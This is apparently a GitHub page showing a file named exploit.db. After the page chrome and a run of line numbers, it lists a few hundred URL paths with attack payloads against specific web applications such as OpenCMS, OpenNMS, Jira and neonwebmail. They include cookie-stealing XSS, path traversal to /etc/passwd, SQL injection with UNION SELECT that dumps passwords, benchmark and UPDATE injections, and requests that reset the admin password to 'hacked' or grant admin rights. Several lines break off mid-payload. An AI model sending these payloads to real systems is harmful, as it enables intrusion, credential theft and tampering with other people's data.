-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathexploit.db
10259 lines (10259 loc) · 696 KB
/
exploit.db
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>
////../../data/config/microsrv.cfg
////////../../../../../../etc/passwd
/Page/1,10966,,00.html?var=<script>alert('s21sec')</script>
/vgn/login?errInfo="%2b%20document.cookie%20%2b"
/vgn/login/1,501,,00.html?cookieName=x--\>
/FormReflectingURLValue?OpenForm&Field=%5B%3Cscript%3E%2E%2E%2E%2E%2E%3C%2Fscript%3E%5D
/sitemindermonitor/doSave.jsp?file=../attacksample.jsp
/url.jsp?foo=<script>alert('XSS vulnerability exists!')</script>
/neonwebmail/downloadfile?filename=filename.ext&savefolder=[traversal]&savefilename=[traversal]
/Search.jsp?query=<script>alert('hi')</script>
/ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data
/AttachFile!default.jspa?id=[VALID_ID]&returnUrl=javascript
/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap=subject&error=admincenter/login.jsp
/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp&action=login&resourcetype=security&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&error=admincenter/login.jsp
/revize/HTTPTranslatorServlet?redirect=/revize/admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=login&resourcetype=security&objectmap=subject&error=admincenter/login.jsp
/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.*
/wlse/configure/archive/archiveApplyDisplay.jsp?displayMsg=<script>document.location='http
/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E
/idm/user/main.jsp?activeControl=";</script><script>alert('Running_scripting_within_the_context_of_'%2bdocument.domain)</script>
/wiki/NewGroup.jsp?group=[XSS]
/elasticpath_dir/manager/getImportFileRedirect.jsp?type=mapping&file=../../../../../boot.ini
/idm/login.jsp?lang=en&cntry=--><textarea>THIS+IS+MY+INJECTED+HTML</textarea><!--
/idm/login.jsp?lang=--><script>window.location="http
/ghboard/component/flashupload/download.jsp?name=[file_name]
/ghboard/component/flashupload/download.jsp?name=../config.js
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
/;www.example.com/jsp-examples/snp/snoop.jsp;[xss]
/ghboard/component/flashupload/data/upload_filename.xxx
/netflow/jspui/appConfig.jsp?task=Modif y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7 2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6 2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6 E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3 E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6 5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3 C%2F%62%6F%64%79%3E&appID=62
/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs
/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e
/pe/repository/displaynavigator.jsp?rootFolder=101
/pe/repository/include/renamepopup.jsp?selectedObject=101
/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/
/forum/bookmarks/insert/2/1.page?action=insertSave&description=<XSS>&module=bookmarks&relation_id=1&relation_type=2&title=<XSS>&visible=1
/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E
/wiki/Login.jsp?tab=profile&loginname=[XSS]&password=Test&password2=Test&wikiname=[XSS]&fullname=[XSS]&email=[XSS]&ok=Save+profile&action=saveProfile
/search.jsp?q=%25%22%3Cscript%3Ealert(1)%3C/script%3E
/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test XSS')</script>
/jira/secure/BrowseProject.jspa?id="><script>alert('XSS')</script>
/path/tc/contents/home001.jsp?contentid=[XSS]
/webapps/portal/frameset.jsp?tab_id=[tabid]&url=[url]
/elasticpath_dir/manager/fileManager.jsp?dir=../../../../WINDOWS/system32/config/
/neonwebmail/updateuser?in_id=admin&in_pass=hacked&in_name=admin&in_admin=1&
/neonwebmail/updateuser?in_id=guest&in_pass=guest&in_name=guest&in_admin=1&
/neonwebmail/updateuser?in_id=admin&exe=read
/neonwebmail/updateuser?in_id=super&in_pass=super&in_name=super&in_admin=1&
/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=[XSS]&changenote=[XSS]&ok=Save
/[search].jsp?[query]=><img src=javascript
/netflow/jspui/index.jsp?grID=-1&view= ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F% 6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74% 6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31% 3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70% 74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
/netflow/jspui/index.jsp?grID=-1&view=g roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20% 68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D% 6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E% 3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F% 70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75% 6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74% 3E%3C%2F%62%6F%64%79%3E&grDisp=1
/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
/usermode/consoleConnect.jsp?consolename=console_name
/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save
/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E
/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E
/wps/wcm/webinterface/login/login.jsp?";><script>maliciou s_script</script><b%20"
/wps/wcm/webinterface/login/login.jsp?"; style="tr
/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true
/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('XSS')</script>
/opennms/j_acegi_security_check?j_username=test'><script>alert('hi');</script>&j_password=test
/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http
/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("trouble_ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
/wsnavigator/jsps/explorer/help.jsp?title=Test">AAAAAAAA<script>alert('XSS')</script>
/swr.jsp?q=%25"<script>alert(1)</script>&swrnum=1
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
/revize/conf/revise.xml
/idm/account/findForSelect.jsp?resultsForm=<script>alert('Running_scripting_within_the_context_of_'%2bdocument.domain)</script>&predefinedQuery=name%3Astarts+with%3A%25
/user-properties.jsp?username=%3C[xss]
/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
/[search].jsp?[query]=><img src=javascript
/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E
/wiki/UserPreferences.jsp?tab=profile&loginname=[XSS]&password=test&password2=test&wikiname=[XSS]&fullname=[XSS]&email=[XSS]&ok=Save+profile&action=saveProfile
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Flogfileview
/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd
/opencms/opencms/system/workplace/editors/editor.jsp?resource=/index.jsp
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts%2Fwebusers/new
/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fmodules%2Fmodules_import
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fdatabase%2Fimporthttp
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Fbroadcast
/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts/users
/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27><img%20src%3d%22javascript
/ReadMessage.jsp?msgno=10001
/ReadMessage.jsp?msgno=10002
/neonwebmail/updatemail?ID=1&getpost=get&folderid=-1&tofolderid=-9&status=1&execute=move
/neonwebmail/updatemail?ID=1&getpost=get&folderid=-9&tofolderid=100&status=1&execute=move
/login.jsp?url=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22hi%22)%3C/script%3E
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57
/%0a%0a<script>alert("jax%20is%20ereet%20
/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
/bugzero/jsp/query.jsp?msg=[XSS]
/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc= ID, SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BYrand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC
/;www.example.com/some_app.jsf?autoscroll=[javascript]
/idm/help/index.jsp?helpUrl=http
/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss]
/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
/jspsnoop/ERROR/%3Cscript%3Ealert(123)%3C/script%3E
/jspsnoop/IOException/%3Cscript%3Ealert(123)%3C/script%3E
/jspsnoop/%3Cscript%3Ealert(123)%3C/script%3E
/wiki/Diff.jsp?page=Administrator&r1=[XSS]&r2=[XSS]
/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script
/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http
/group-summary.jsp?search=%22%3E%3C[xss]
/path/msg.jsp?msg=[XSS]
/log.jsp?log=..\..\..\windows\debug\netsetup
/bugzero/jsp/edit.jsp?projectId=&entryId=[XSS]
/search.jsp?oe=english&q=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&qor=
/revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects
/revize/debug/query_results.jsp?query=select%20*%20from%20pbpublic.rSubjects
/neonwebmail/maillist?getpost=get&PAGE=1&folderid=-1&sysid=0&sortkey=SENDER, rand(benchmark(1000000000000,sha1('123456781234567812345678')))&sortkey_desc=&sendkind=&searchlist=
/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http
/neonwebmail/updateuser?in_id=admin&in_pass=hacked&
/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386737&addr=127.0.0.1&_editedtext=[XSS]&author=AnonymousCoward&link=&ok=Save
/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/
/owProductDetail.asp?idProduct='SQL_INJECTION
/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
/registration-form.html?ClickFrom=[xss]
/admin/login.asp">
/login.asp">
/store/tellAFriend.asp?idProduct='"><script>alert(document.cookie)</script>
/sa3.5.2.14/scripts/prodList.asp?brand='[sql]
/userslist.asp?page=2'&catid=16
/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible
/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala
/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='
/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565
/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]
/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]
/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles
/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4
/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1
/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category
/Request-call-back.html?ClickFrom=[xss]
/Search_1.aspx?pojam=[XSS]
/login.asp?ret_page=[XSS]
/UserControls/Popups/frmHelp.aspx?url='%22--%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E
/products.asp?partno=[sql]
/index.asp?Block=1&page=[SQL INJECTION]
/listmain.asp?cat='[sql]
/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]
/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/multi/city.asp?probe=[Code]
/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
/dispuser.asp?name=Walltrapass[XSS-CODE]
/manager/backup.asp?bck=./../file.asp
/error.asp?Message_id=35<script>alert(document.cookie)</script>
/post3/Book.asp?review=<script>alert(/xss/)</script>
/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version--
/aspdotnetcart/admin/deleteicon.aspx?ProductID=1&Fo
/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
/ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2-
/SearchResults.asp?SearchWord=[SQLCOMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0
/scart/admin/login.asp?AdminID=admin&AdminPWD='[SQL Injection]
/scart/admin/login.asp?AdminID=admin&AdminPWD=''='[SQL Injection]
/cv.asp
/path/filelist.asp?parentid=0&show_id=[SQL INJECTION]
/path/filelist.asp?parentid=[sql injection]&show_id=1
/Labels.asp?&Term=SQL
/searchdb.asp?q=[CODE]&mode=AND&Submit=Search
/admin/inc_edit.asp?iEve=1
/admin/inc_events.asp
/admin/inc_type.asp
/admin/inc_cats.asp
/admin/inc_users.asp
/admin/inc_user_edit.asp?id=admin
/admin/inc_links.asp
/admin/inc_edit.asp?iLink=10
/admin/inc_type.asp
/admin/inc_files.asp
/admin/inc_edit.asp?iFile=50
/admin/inc_type.asp
/admin/inc_pictures.asp
/admin/inc_edit.asp?iPic=100
/admin/inc_type.asp
/admin/inc_add.asp
/admin/inc_pics.asp
/admin/inc_edit.asp?iPic=500
/admin/inc_type.asp
/admin/inc_channel_listing.asp
/admin/inc_channel_edit.asp?iChannel=5
/admin/inc_config.asp
/admin/inc_users.asp
/admin/inc_users_edit.asp?iUser=admin
/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"><script>function
/stealer/?userid=" +
/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"><SCRIPT>PAYLOAD
/acartpath/signin.asp?msg=<script>alert('Zone-h')</script>
/search.asp?searchtxt=[XSS]
/path/admin/main.asp?date=[CSS]
/products/detail.asp?iPro='
/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>
/csm/asp/listings.asp?s=%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
/bp/myFiles.asp
/forum/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><
/csm/asp/detail.asp?l=&p='[sql]
/dc_Categoriesview.asp??key='&RecPerPage=5
/demo/dc_productslist_Clearance.asp?cmd=%27
/demo/ratings.asp??PID='
/demo/dc_forum_Postslist.asp?start='
/demo/dc_forum_Postslist.asp?key_m='
/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='
/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1
/path/diziler.asp?id=[Sql Injection]
/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users
/path_to_comersus/comersus_customerLoggedVerify.asp?
/homeDetail.asp?AD_ID='[sql]
/DUamazonPro/admin/catDelete.asp?iCat=13[SQL Inject]
/DUforum/messageDetail.asp?MSG_ID=1;[SQL INJECT]
/login.asp?SessionID=[XSS]
/blog/\n";
/eshopv-8/product.asp?intProdID='SQL_INJECTION&%3bstrCatalog_NAME=&%3bstrSubCatalog_NAME=&%3bstrSubCatalogID=&%3bintCatalogID=10001&%3bCurCatalogID=
/mcart2pfp/product.asp?intProdID='SQL_INJECTION
/mcart2sqluk/product.asp?intProdID='SQL_INJECTION
/mcart2pal/product.asp?intProdID='SQL_INJECTION
/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler
/detay.asp?Emlak=[SQL]
/resulttype.asp?probe=[Code]
/welcome.asp?id=[SQL]
/welcome.asp?page=search.asp&search=[SQL]
/welcome.asp?page=content_display.asp&id=[SQL]
/welcome.asp?page=customer_list.asp&ctype=[SQL]
/welcome.asp?page=calendar_add.asp&id=[SQL]
/welcome.asp?action=invitation&calendarid=[SQL]&ans=1
/welcome.asp?page=employee_detail.asp&lid=&id=[SQL]
/welcome.asp?page=customer_list.asp&ctype=[SQL]
/welcome.asp?page=front_calendar_display.asp&ctype=[SQL]
/welcome.asp?page=calendar_display.asp&id=[SQL]
/welcome.asp?page=front_content_display.asp&ctype=[SQL]
/welcome.asp?page=message_send.asp&id=[SQL]
/welcome.asp?action=delmessage&id=[SQL]
/welcome.asp?page=message.asp&id=[SQL]
/welcome.asp?page=content_search.asp&search=[SQL]
/welcome.asp?page=content_display.asp&id=[SQL]&category=[SQL]
/welcome.asp?page=category_display.asp&category=[SQL]
/welcome.asp?page=contact_form.asp&id=[SQL]
/welcome.asp?id=30&ctype=1&lid=f30&page=folder_detail.asp
/welcome.asp?page=message.asp&id=4
/welcome.asp?action=delmessage&id=3
/fileupload.asp" enctype="multipart/form-data" id="form1" name="form1">
/DUforum/post.asp?iFor=6[SQL Inject]
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
